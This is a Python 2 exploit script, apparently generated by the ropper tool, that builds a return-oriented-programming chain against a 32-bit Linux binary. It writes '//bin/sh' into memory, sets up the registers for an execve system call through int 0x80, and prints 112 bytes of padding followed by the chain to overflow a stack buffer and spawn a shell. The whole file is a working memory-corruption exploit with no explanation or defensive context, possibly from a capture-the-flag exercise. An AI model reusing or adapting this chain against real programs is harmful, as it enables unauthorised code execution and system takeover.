#!/usr/bin/env python
# Generated by ropper ropchain generator #
from struct import pack

p = lambda x : pack('I', x)

IMAGE_BASE_0 = 0x08048000 # af1ec68b588403db0b9765c7b58752299bbd3422045d324b1f1475bfd6256200
rebase_0 = lambda x : p(x + IMAGE_BASE_0)

rop = ''

rop += p(0x08056194) # pop eax; pop edx; pop ebx; ret;
rop += rebase_0(0x000ab060)
rop += '//bi'
rop += p(0xdeadbeef)
rop += rebase_0(0x0003659a) # 0x0807e59a: mov dword ptr [eax], edx; pop ebx; pop esi; pop edi; ret; 
rop += p(0xdeadbeef)
rop += p(0xdeadbeef)
rop += p(0xdeadbeef)
rop += p(0x08056194) # pop eax; pop edx; pop ebx; ret; 
rop += rebase_0(0x000ab064)
rop += 'n/sh'
rop += p(0xdeadbeef)
rop += rebase_0(0x0003659a) # 0x0807e59a: mov dword ptr [eax], edx; pop ebx; pop esi; pop edi; ret; 
rop += p(0xdeadbeef)
rop += p(0xdeadbeef)
rop += p(0xdeadbeef)
rop += rebase_0(0x0000e280) # 0x08056280: xor eax, eax; ret; 
rop += rebase_0(0x0002912b) # 0x0807112b: pop edx; ret; 
rop += rebase_0(0x000ab068)
rop += rebase_0(0x0000ecc5) # 0x08056cc5: mov dword ptr [edx], eax; ret; 
rop += rebase_0(0x00029152) # 0x08071152: pop ecx; pop ebx; ret; 
rop += rebase_0(0x000ab068)
rop += p(0xdeadbeef)
rop += p(0x08056194) # pop eax; pop edx; pop ebx; ret;
rop += p(0xfffffff5)
rop += rebase_0(0x000ab068)
rop += rebase_0(0x000ab060)
rop += rebase_0(0x0001a3a8) # 0x080623a8: neg eax; ret; 
rop += rebase_0(0x00029a60) # 0x08071a60: int 0x80; ret; 
print "A"*112 + rop
